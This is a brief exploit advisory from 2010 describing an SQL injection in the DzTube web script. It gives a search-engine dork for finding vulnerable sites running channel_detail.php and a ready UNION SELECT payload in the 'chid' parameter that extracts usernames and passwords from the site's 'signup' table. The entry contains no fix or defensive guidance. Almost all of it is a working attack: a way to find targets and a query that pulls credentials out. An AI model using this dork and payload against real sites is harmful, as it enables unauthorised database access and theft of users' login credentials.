DzTube - SQL Injection
Title: DzTube SQL Injection Vulnerability
Discovered: ErrNick
Site: xaknet.ru
Date: 28/12/2010
Vendor: n/a
d0rK: inurl:"channel_detail.php?chid="
Exploit: host.com/channel_detail.php?chid=[SQL]
Demo:
http://site/channel_detail.php?chid=-51+union+select+1,username,pwd,4,5,6,7,8,9,0,1,2,3,4,5,6+from+signup
Greatz: to xaknet.ru vulnes.com